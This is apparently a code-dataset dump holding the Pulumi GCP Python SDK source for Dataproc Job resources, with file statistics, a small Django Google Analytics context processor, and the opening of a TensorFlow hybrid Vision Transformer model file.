return pulumi.get(self, "pyspark_config")
@pyspark_config.setter
def pyspark_config(self, value: Optional[pulumi.Input['JobPysparkConfigArgs']]):
pulumi.set(self, "pyspark_config", value)
@property
@pulumi.getter
def reference(self) -> Optional[pulumi.Input['JobReferenceArgs']]:
"""
The reference of the job
"""
return pulumi.get(self, "reference")
@reference.setter
def reference(self, value: Optional[pulumi.Input['JobReferenceArgs']]):
pulumi.set(self, "reference", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def scheduling(self) -> Optional[pulumi.Input['JobSchedulingArgs']]:
"""
Optional. Job scheduling configuration.
"""
return pulumi.get(self, "scheduling")
@scheduling.setter
def scheduling(self, value: Optional[pulumi.Input['JobSchedulingArgs']]):
pulumi.set(self, "scheduling", value)
@property
@pulumi.getter(name="sparkConfig")
def spark_config(self) -> Optional[pulumi.Input['JobSparkConfigArgs']]:
"""
The config of the Spark job.
"""
return pulumi.get(self, "spark_config")
@spark_config.setter
def spark_config(self, value: Optional[pulumi.Input['JobSparkConfigArgs']]):
pulumi.set(self, "spark_config", value)
@property
@pulumi.getter(name="sparksqlConfig")
def sparksql_config(self) -> Optional[pulumi.Input['JobSparksqlConfigArgs']]:
"""
The config of SparkSql job
"""
return pulumi.get(self, "sparksql_config")
@sparksql_config.setter
def sparksql_config(self, value: Optional[pulumi.Input['JobSparksqlConfigArgs']]):
pulumi.set(self, "sparksql_config", value)
@pulumi.input_type
class _JobState:
def __init__(__self__, *,
driver_controls_files_uri: Optional[pulumi.Input[str]] = None,
driver_output_resource_uri: Optional[pulumi.Input[str]] = None,
force_delete: Optional[pulumi.Input[bool]] = None,
hadoop_config: Optional[pulumi.Input['JobHadoopConfigArgs']] = None,
hive_config: Optional[pulumi.Input['JobHiveConfigArgs']] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pig_config: Optional[pulumi.Input['JobPigConfigArgs']] = None,
placement: Optional[pulumi.Input['JobPlacementArgs']] = None,
project: Optional[pulumi.Input[str]] = None,
pyspark_config: Optional[pulumi.Input['JobPysparkConfigArgs']] = None,
reference: Optional[pulumi.Input['JobReferenceArgs']] = None,
region: Optional[pulumi.Input[str]] = None,
scheduling: Optional[pulumi.Input['JobSchedulingArgs']] = None,
spark_config: Optional[pulumi.Input['JobSparkConfigArgs']] = None,
sparksql_config: Optional[pulumi.Input['JobSparksqlConfigArgs']] = None,
statuses: Optional[pulumi.Input[Sequence[pulumi.Input['JobStatusArgs']]]] = None):
"""
Input properties used for looking up and filtering Job resources.
:param pulumi.Input[str] driver_controls_files_uri: If present, the location of miscellaneous control files which may be used as part of job setup and handling. If not present, control files may be placed in the same location as driver_output_uri.
:param pulumi.Input[str] driver_output_resource_uri: A URI pointing to the location of the stdout of the job's driver program.
:param pulumi.Input[bool] force_delete: By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
:param pulumi.Input['JobHadoopConfigArgs'] hadoop_config: The config of Hadoop job
:param pulumi.Input['JobHiveConfigArgs'] hive_config: The config of hive job
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: The list of labels (key/value pairs) to add to the job.
:param pulumi.Input['JobPigConfigArgs'] pig_config: The config of pag job.
:param pulumi.Input['JobPlacementArgs'] placement: The config of job placement.
:param pulumi.Input[str] project: The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
:param pulumi.Input['JobPysparkConfigArgs'] pyspark_config: The config of pySpark job.
:param pulumi.Input['JobReferenceArgs'] reference: The reference of the job
:param pulumi.Input[str] region: The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
:param pulumi.Input['JobSchedulingArgs'] scheduling: Optional. Job scheduling configuration.
:param pulumi.Input['JobSparkConfigArgs'] spark_config: The config of the Spark job.
:param pulumi.Input['JobSparksqlConfigArgs'] sparksql_config: The config of SparkSql job
:param pulumi.Input[Sequence[pulumi.Input['JobStatusArgs']]] statuses: The status of the job.
"""
if driver_controls_files_uri is not None:
pulumi.set(__self__, "driver_controls_files_uri", driver_controls_files_uri)
if driver_output_resource_uri is not None:
pulumi.set(__self__, "driver_output_resource_uri", driver_output_resource_uri)
if force_delete is not None:
pulumi.set(__self__, "force_delete", force_delete)
if hadoop_config is not None:
pulumi.set(__self__, "hadoop_config", hadoop_config)
if hive_config is not None:
pulumi.set(__self__, "hive_config", hive_config)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if pig_config is not None:
pulumi.set(__self__, "pig_config", pig_config)
if placement is not None:
pulumi.set(__self__, "placement", placement)
if project is not None:
pulumi.set(__self__, "project", project)
if pyspark_config is not None:
pulumi.set(__self__, "pyspark_config", pyspark_config)
if reference is not None:
pulumi.set(__self__, "reference", reference)
if region is not None:
pulumi.set(__self__, "region", region)
if scheduling is not None:
pulumi.set(__self__, "scheduling", scheduling)
if spark_config is not None:
pulumi.set(__self__, "spark_config", spark_config)
if sparksql_config is not None:
pulumi.set(__self__, "sparksql_config", sparksql_config)
if statuses is not None:
pulumi.set(__self__, "statuses", statuses)
@property
@pulumi.getter(name="driverControlsFilesUri")
def driver_controls_files_uri(self) -> Optional[pulumi.Input[str]]:
"""
If present, the location of miscellaneous control files which may be used as part of job setup and handling. If not present, control files may be placed in the same location as driver_output_uri.
"""
return pulumi.get(self, "driver_controls_files_uri")
@driver_controls_files_uri.setter
def driver_controls_files_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_controls_files_uri", value)
@property
@pulumi.getter(name="driverOutputResourceUri")
def driver_output_resource_uri(self) -> Optional[pulumi.Input[str]]:
"""
A URI pointing to the location of the stdout of the job's driver program.
"""
return pulumi.get(self, "driver_output_resource_uri")
@driver_output_resource_uri.setter
def driver_output_resource_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_output_resource_uri", value)
@property
@pulumi.getter(name="forceDelete")
def force_delete(self) -> Optional[pulumi.Input[bool]]:
"""
By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
"""
return pulumi.get(self, "force_delete")
@force_delete.setter
def force_delete(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_delete", value)
@property
@pulumi.getter(name="hadoopConfig")
def hadoop_config(self) -> Optional[pulumi.Input['JobHadoopConfigArgs']]:
"""
The config of Hadoop job
"""
return pulumi.get(self, "hadoop_config")
@hadoop_config.setter
def hadoop_config(self, value: Optional[pulumi.Input['JobHadoopConfigArgs']]):
pulumi.set(self, "hadoop_config", value)
@property
@pulumi.getter(name="hiveConfig")
def hive_config(self) -> Optional[pulumi.Input['JobHiveConfigArgs']]:
"""
The config of hive job
"""
return pulumi.get(self, "hive_config")
@hive_config.setter
def hive_config(self, value: Optional[pulumi.Input['JobHiveConfigArgs']]):
pulumi.set(self, "hive_config", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
The list of labels (key/value pairs) to add to the job.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="pigConfig")
def pig_config(self) -> Optional[pulumi.Input['JobPigConfigArgs']]:
"""
The config of pag job.
"""
return pulumi.get(self, "pig_config")
@pig_config.setter
def pig_config(self, value: Optional[pulumi.Input['JobPigConfigArgs']]):
pulumi.set(self, "pig_config", value)
@property
@pulumi.getter
def placement(self) -> Optional[pulumi.Input['JobPlacementArgs']]:
"""
The config of job placement.
"""
return pulumi.get(self, "placement")
@placement.setter
def placement(self, value: Optional[pulumi.Input['JobPlacementArgs']]):
pulumi.set(self, "placement", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="pysparkConfig")
def pyspark_config(self) -> Optional[pulumi.Input['JobPysparkConfigArgs']]:
"""
The config of pySpark job.
"""
return pulumi.get(self, "pyspark_config")
@pyspark_config.setter
def pyspark_config(self, value: Optional[pulumi.Input['JobPysparkConfigArgs']]):
pulumi.set(self, "pyspark_config", value)
@property
@pulumi.getter
def reference(self) -> Optional[pulumi.Input['JobReferenceArgs']]:
"""
The reference of the job
"""
return pulumi.get(self, "reference")
@reference.setter
def reference(self, value: Optional[pulumi.Input['JobReferenceArgs']]):
pulumi.set(self, "reference", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def scheduling(self) -> Optional[pulumi.Input['JobSchedulingArgs']]:
"""
Optional. Job scheduling configuration.
"""
return pulumi.get(self, "scheduling")
@scheduling.setter
def scheduling(self, value: Optional[pulumi.Input['JobSchedulingArgs']]):
pulumi.set(self, "scheduling", value)
@property
@pulumi.getter(name="sparkConfig")
def spark_config(self) -> Optional[pulumi.Input['JobSparkConfigArgs']]:
"""
The config of the Spark job.
"""
return pulumi.get(self, "spark_config")
@spark_config.setter
def spark_config(self, value: Optional[pulumi.Input['JobSparkConfigArgs']]):
pulumi.set(self, "spark_config", value)
@property
@pulumi.getter(name="sparksqlConfig")
def sparksql_config(self) -> Optional[pulumi.Input['JobSparksqlConfigArgs']]:
"""
The config of SparkSql job
"""
return pulumi.get(self, "sparksql_config")
@sparksql_config.setter
def sparksql_config(self, value: Optional[pulumi.Input['JobSparksqlConfigArgs']]):
pulumi.set(self, "sparksql_config", value)
@property
@pulumi.getter
def statuses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JobStatusArgs']]]]:
"""
The status of the job.
"""
return pulumi.get(self, "statuses")
@statuses.setter
def statuses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JobStatusArgs']]]]):
pulumi.set(self, "statuses", value)
class Job(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
force_delete: Optional[pulumi.Input[bool]] = None,
hadoop_config: Optional[pulumi.Input[pulumi.InputType['JobHadoopConfigArgs']]] = None,
hive_config: Optional[pulumi.Input[pulumi.InputType['JobHiveConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pig_config: Optional[pulumi.Input[pulumi.InputType['JobPigConfigArgs']]] = None,
placement: Optional[pulumi.Input[pulumi.InputType['JobPlacementArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
pyspark_config: Optional[pulumi.Input[pulumi.InputType['JobPysparkConfigArgs']]] = None,
reference: Optional[pulumi.Input[pulumi.InputType['JobReferenceArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
scheduling: Optional[pulumi.Input[pulumi.InputType['JobSchedulingArgs']]] = None,
spark_config: Optional[pulumi.Input[pulumi.InputType['JobSparkConfigArgs']]] = None,
sparksql_config: Optional[pulumi.Input[pulumi.InputType['JobSparksqlConfigArgs']]] = None,
__props__=None):
"""
Manages a job resource within a Dataproc cluster within GCE. For more information see
[the official dataproc documentation](https://cloud.google.com/dataproc/).
!> **Note:** This resource does not support 'update' and changing any attributes will cause the resource to be recreated.
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
mycluster = gcp.dataproc.Cluster("mycluster", region="us-central1")
# Submit an example spark job to a dataproc cluster
spark = gcp.dataproc.Job("spark",
region=mycluster.region,
force_delete=True,
placement=gcp.dataproc.JobPlacementArgs(
cluster_name=mycluster.name,
),
spark_config=gcp.dataproc.JobSparkConfigArgs(
main_class="org.apache.spark.examples.SparkPi",
jar_file_uris=["file:///usr/lib/spark/examples/jars/spark-examples.jar"],
args=["1000"],
properties={
"spark.logConf": "true",
},
logging_config=gcp.dataproc.JobSparkConfigLoggingConfigArgs(
driver_log_levels={
"root": "INFO",
},
),
))
# Submit an example pyspark job to a dataproc cluster
pyspark = gcp.dataproc.Job("pyspark",
region=mycluster.region,
force_delete=True,
placement=gcp.dataproc.JobPlacementArgs(
cluster_name=mycluster.name,
),
pyspark_config=gcp.dataproc.JobPysparkConfigArgs(
main_python_file_uri="gs://dataproc-examples-2f10d78d114f6aaec76462e3c310f31f/src/pyspark/hello-world/hello-world.py",
properties={
"spark.logConf": "true",
},
))
pulumi.export("sparkStatus", spark.statuses[0].state)
pulumi.export("pysparkStatus", pyspark.statuses[0].state)
```
## Import
This resource does not support import.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] force_delete: By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
:param pulumi.Input[pulumi.InputType['JobHadoopConfigArgs']] hadoop_config: The config of Hadoop job
:param pulumi.Input[pulumi.InputType['JobHiveConfigArgs']] hive_config: The config of hive job
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: The list of labels (key/value pairs) to add to the job.
:param pulumi.Input[pulumi.InputType['JobPigConfigArgs']] pig_config: The config of pag job.
:param pulumi.Input[pulumi.InputType['JobPlacementArgs']] placement: The config of job placement.
:param pulumi.Input[str] project: The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
:param pulumi.Input[pulumi.InputType['JobPysparkConfigArgs']] pyspark_config: The config of pySpark job.
:param pulumi.Input[pulumi.InputType['JobReferenceArgs']] reference: The reference of the job
:param pulumi.Input[str] region: The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
:param pulumi.Input[pulumi.InputType['JobSchedulingArgs']] scheduling: Optional. Job scheduling configuration.
:param pulumi.Input[pulumi.InputType['JobSparkConfigArgs']] spark_config: The config of the Spark job.
:param pulumi.Input[pulumi.InputType['JobSparksqlConfigArgs']] sparksql_config: The config of SparkSql job
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: JobArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a job resource within a Dataproc cluster within GCE. For more information see
[the official dataproc documentation](https://cloud.google.com/dataproc/).
!> **Note:** This resource does not support 'update' and changing any attributes will cause the resource to be recreated.
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
mycluster = gcp.dataproc.Cluster("mycluster", region="us-central1")
# Submit an example spark job to a dataproc cluster
spark = gcp.dataproc.Job("spark",
region=mycluster.region,
force_delete=True,
placement=gcp.dataproc.JobPlacementArgs(
cluster_name=mycluster.name,
),
spark_config=gcp.dataproc.JobSparkConfigArgs(
main_class="org.apache.spark.examples.SparkPi",
jar_file_uris=["file:///usr/lib/spark/examples/jars/spark-examples.jar"],
args=["1000"],
properties={
"spark.logConf": "true",
},
logging_config=gcp.dataproc.JobSparkConfigLoggingConfigArgs(
driver_log_levels={
"root": "INFO",
},
),
))
# Submit an example pyspark job to a dataproc cluster
pyspark = gcp.dataproc.Job("pyspark",
region=mycluster.region,
force_delete=True,
placement=gcp.dataproc.JobPlacementArgs(
cluster_name=mycluster.name,
),
pyspark_config=gcp.dataproc.JobPysparkConfigArgs(
main_python_file_uri="gs://dataproc-examples-2f10d78d114f6aaec76462e3c310f31f/src/pyspark/hello-world/hello-world.py",
properties={
"spark.logConf": "true",
},
))
pulumi.export("sparkStatus", spark.statuses[0].state)
pulumi.export("pysparkStatus", pyspark.statuses[0].state)
```
## Import
This resource does not support import.
:param str resource_name: The name of the resource.
:param JobArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(JobArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
force_delete: Optional[pulumi.Input[bool]] = None,
hadoop_config: Optional[pulumi.Input[pulumi.InputType['JobHadoopConfigArgs']]] = None,
hive_config: Optional[pulumi.Input[pulumi.InputType['JobHiveConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pig_config: Optional[pulumi.Input[pulumi.InputType['JobPigConfigArgs']]] = None,
placement: Optional[pulumi.Input[pulumi.InputType['JobPlacementArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
pyspark_config: Optional[pulumi.Input[pulumi.InputType['JobPysparkConfigArgs']]] = None,
reference: Optional[pulumi.Input[pulumi.InputType['JobReferenceArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
scheduling: Optional[pulumi.Input[pulumi.InputType['JobSchedulingArgs']]] = None,
spark_config: Optional[pulumi.Input[pulumi.InputType['JobSparkConfigArgs']]] = None,
sparksql_config: Optional[pulumi.Input[pulumi.InputType['JobSparksqlConfigArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = JobArgs.__new__(JobArgs)
__props__.__dict__["force_delete"] = force_delete
__props__.__dict__["hadoop_config"] = hadoop_config
__props__.__dict__["hive_config"] = hive_config
__props__.__dict__["labels"] = labels
__props__.__dict__["pig_config"] = pig_config
if placement is None and not opts.urn:
raise TypeError("Missing required property 'placement'")
__props__.__dict__["placement"] = placement
__props__.__dict__["project"] = project
__props__.__dict__["pyspark_config"] = pyspark_config
__props__.__dict__["reference"] = reference
__props__.__dict__["region"] = region
__props__.__dict__["scheduling"] = scheduling
__props__.__dict__["spark_config"] = spark_config
__props__.__dict__["sparksql_config"] = sparksql_config
__props__.__dict__["driver_controls_files_uri"] = None
__props__.__dict__["driver_output_resource_uri"] = None
__props__.__dict__["statuses"] = None
super(Job, __self__).__init__(
'gcp:dataproc/job:Job',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
driver_controls_files_uri: Optional[pulumi.Input[str]] = None,
driver_output_resource_uri: Optional[pulumi.Input[str]] = None,
force_delete: Optional[pulumi.Input[bool]] = None,
hadoop_config: Optional[pulumi.Input[pulumi.InputType['JobHadoopConfigArgs']]] = None,
hive_config: Optional[pulumi.Input[pulumi.InputType['JobHiveConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pig_config: Optional[pulumi.Input[pulumi.InputType['JobPigConfigArgs']]] = None,
placement: Optional[pulumi.Input[pulumi.InputType['JobPlacementArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
pyspark_config: Optional[pulumi.Input[pulumi.InputType['JobPysparkConfigArgs']]] = None,
reference: Optional[pulumi.Input[pulumi.InputType['JobReferenceArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
scheduling: Optional[pulumi.Input[pulumi.InputType['JobSchedulingArgs']]] = None,
spark_config: Optional[pulumi.Input[pulumi.InputType['JobSparkConfigArgs']]] = None,
sparksql_config: Optional[pulumi.Input[pulumi.InputType['JobSparksqlConfigArgs']]] = None,
statuses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['JobStatusArgs']]]]] = None) -> 'Job':
"""
Get an existing Job resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] driver_controls_files_uri: If present, the location of miscellaneous control files which may be used as part of job setup and handling. If not present, control files may be placed in the same location as driver_output_uri.
:param pulumi.Input[str] driver_output_resource_uri: A URI pointing to the location of the stdout of the job's driver program.
:param pulumi.Input[bool] force_delete: By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
:param pulumi.Input[pulumi.InputType['JobHadoopConfigArgs']] hadoop_config: The config of Hadoop job
:param pulumi.Input[pulumi.InputType['JobHiveConfigArgs']] hive_config: The config of hive job
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: The list of labels (key/value pairs) to add to the job.
:param pulumi.Input[pulumi.InputType['JobPigConfigArgs']] pig_config: The config of pag job.
:param pulumi.Input[pulumi.InputType['JobPlacementArgs']] placement: The config of job placement.
:param pulumi.Input[str] project: The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
:param pulumi.Input[pulumi.InputType['JobPysparkConfigArgs']] pyspark_config: The config of pySpark job.
:param pulumi.Input[pulumi.InputType['JobReferenceArgs']] reference: The reference of the job
:param pulumi.Input[str] region: The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
:param pulumi.Input[pulumi.InputType['JobSchedulingArgs']] scheduling: Optional. Job scheduling configuration.
:param pulumi.Input[pulumi.InputType['JobSparkConfigArgs']] spark_config: The config of the Spark job.
:param pulumi.Input[pulumi.InputType['JobSparksqlConfigArgs']] sparksql_config: The config of SparkSql job
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['JobStatusArgs']]]] statuses: The status of the job.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _JobState.__new__(_JobState)
__props__.__dict__["driver_controls_files_uri"] = driver_controls_files_uri
__props__.__dict__["driver_output_resource_uri"] = driver_output_resource_uri
__props__.__dict__["force_delete"] = force_delete
__props__.__dict__["hadoop_config"] = hadoop_config
__props__.__dict__["hive_config"] = hive_config
__props__.__dict__["labels"] = labels
__props__.__dict__["pig_config"] = pig_config
__props__.__dict__["placement"] = placement
__props__.__dict__["project"] = project
__props__.__dict__["pyspark_config"] = pyspark_config
__props__.__dict__["reference"] = reference
__props__.__dict__["region"] = region
__props__.__dict__["scheduling"] = scheduling
__props__.__dict__["spark_config"] = spark_config
__props__.__dict__["sparksql_config"] = sparksql_config
__props__.__dict__["statuses"] = statuses
return Job(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="driverControlsFilesUri")
def driver_controls_files_uri(self) -> pulumi.Output[str]:
"""
If present, the location of miscellaneous control files which may be used as part of job setup and handling. If not present, control files may be placed in the same location as driver_output_uri.
"""
return pulumi.get(self, "driver_controls_files_uri")
@property
@pulumi.getter(name="driverOutputResourceUri")
def driver_output_resource_uri(self) -> pulumi.Output[str]:
"""
A URI pointing to the location of the stdout of the job's driver program.
"""
return pulumi.get(self, "driver_output_resource_uri")
@property
@pulumi.getter(name="forceDelete")
def force_delete(self) -> pulumi.Output[Optional[bool]]:
"""
By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
"""
return pulumi.get(self, "force_delete")
@property
@pulumi.getter(name="hadoopConfig")
def hadoop_config(self) -> pulumi.Output[Optional['outputs.JobHadoopConfig']]:
"""
The config of Hadoop job
"""
return pulumi.get(self, "hadoop_config")
@property
@pulumi.getter(name="hiveConfig")
def hive_config(self) -> pulumi.Output[Optional['outputs.JobHiveConfig']]:
"""
The config of hive job
"""
return pulumi.get(self, "hive_config")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
The list of labels (key/value pairs) to add to the job.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="pigConfig")
def pig_config(self) -> pulumi.Output[Optional['outputs.JobPigConfig']]:
"""
The config of pag job.
"""
return pulumi.get(self, "pig_config")
@property
@pulumi.getter
def placement(self) -> pulumi.Output['outputs.JobPlacement']:
"""
The config of job placement.
"""
return pulumi.get(self, "placement")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="pysparkConfig")
def pyspark_config(self) -> pulumi.Output[Optional['outputs.JobPysparkConfig']]:
"""
The config of pySpark job.
"""
return pulumi.get(self, "pyspark_config")
@property
@pulumi.getter
def reference(self) -> pulumi.Output['outputs.JobReference']:
"""
The reference of the job
"""
return pulumi.get(self, "reference")
@property
@pulumi.getter
def region(self) -> pulumi.Output[Optional[str]]:
"""
The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def scheduling(self) -> pulumi.Output[Optional['outputs.JobScheduling']]:
"""
Optional. Job scheduling configuration.
"""
return pulumi.get(self, "scheduling")
@property
@pulumi.getter(name="sparkConfig")
def spark_config(self) -> pulumi.Output[Optional['outputs.JobSparkConfig']]:
"""
The config of the Spark job.
"""
return pulumi.get(self, "spark_config")
@property
@pulumi.getter(name="sparksqlConfig")
def sparksql_config(self) -> pulumi.Output[Optional['outputs.JobSparksqlConfig']]:
"""
The config of SparkSql job
"""
return pulumi.get(self, "sparksql_config")
@property
@pulumi.getter
def statuses(self) -> pulumi.Output[Sequence['outputs.JobStatus']]:
"""
The status of the job.
"""
return pulumi.get(self, "statuses")
| 45.835307 | 255 | 0.648411 | 4,747 | 42,581 | 5.631557 | 0.059827 | 0.08641 | 0.089552 | 0.045711 | 0.925111 | 0.917144 | 0.889575 | 0.877829 | 0.865971 | 0.840721 | 0 | 0.001711 | 0.24525 | 42,581 | 928 | 256 | 45.884698 | 0.830108 | 0.340504 | 0 | 0.807377 | 1 | 0 | 0.150189 | 0.028332 | 0 | 0 | 0 | 0 | 0 | 1 | 0.165984 | false | 0.002049 | 0.014344 | 0 | 0.280738 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5bb9b66038f7b90d62f105b583bcd745b8646ab3 | 163 | py | Python | agagd/agagd_core/context_processors/google_analytics.py | annabunches/agagd | 94946b4ec9ebefdb1e4953e7e78f0bb9125adc76 | [
"MIT"
] | null | null | null | agagd/agagd_core/context_processors/google_analytics.py | annabunches/agagd | 94946b4ec9ebefdb1e4953e7e78f0bb9125adc76 | [
"MIT"
] | null | null | null | agagd/agagd_core/context_processors/google_analytics.py | annabunches/agagd | 94946b4ec9ebefdb1e4953e7e78f0bb9125adc76 | [
"MIT"
] | null | null | null | def google_analytics_tracking_id(request):
from django.conf import settings
return {'google_analytics_tracking_id': settings.GOOGLE_ANALYTICS_TRACKING_ID}
| 40.75 | 82 | 0.834356 | 21 | 163 | 6.047619 | 0.571429 | 0.354331 | 0.543307 | 0.590551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104294 | 163 | 3 | 83 | 54.333333 | 0.869863 | 0 | 0 | 0 | 0 | 0 | 0.171779 | 0.171779 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f399b05b91385873d8f3ae56229af973768e7744 | 6,099 | py | Python | tfimm/architectures/vit_hybrid.py | hyenal/tensorflow-image-models | 2012be8ecc7bc23e84dc2488d3e4fe1c80dbfb2c | [
"Apache-2.0"
] | 1 | 2022-01-31T00:48:06.000Z | 2022-01-31T00:48:06.000Z | tfimm/architectures/vit_hybrid.py | hyenal/tensorflow-image-models | 2012be8ecc7bc23e84dc2488d3e4fe1c80dbfb2c | [
"Apache-2.0"
] | null | null | null | tfimm/architectures/vit_hybrid.py | hyenal/tensorflow-image-models | 2012be8ecc7bc23e84dc2488d3e4fe1c80dbfb2c | [
"Apache-2.0"
] | null | null | null | """
Hybrid Vision Transformer (ViT) in TensorFlow
A TensorFlow implement of the Hybrid Vision Transformers as described in:
'An Image Is Worth 16 x 16 Words: Transformers for Image Recognition at Scale'
- https://arxiv.org/abs/2010.11929
`How to train your ViT? Data, Augmentation, and Regularization in Vision Transformers`
- https://arxiv.org/abs/2106.10270
These hybrid model definitions depend on code in vision_transformer.py.
They were moved here to keep file sizes sane.
Copyright 2021 Martins Bruveris
Copyright 2021 Ross Wightman
"""
from tfimm.models import register_model
from .vit import ViT, ViTConfig
# Model_registry will add each entrypoint function to this
__all__ = []
@register_model
def vit_tiny_r_s16_p8_224():
"""R+ViT-Ti/S16 w/ 8x8 patch hybrid @ 224 x 224."""
cfg = ViTConfig(
name="vit_tiny_r_s16_p8_224",
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(),
patch_size=8,
embed_dim=192,
nb_blocks=12,
nb_heads=3,
crop_pct=0.9,
first_conv="patch_embed/backbone/conv",
)
return ViT, cfg
@register_model
def vit_tiny_r_s16_p8_384():
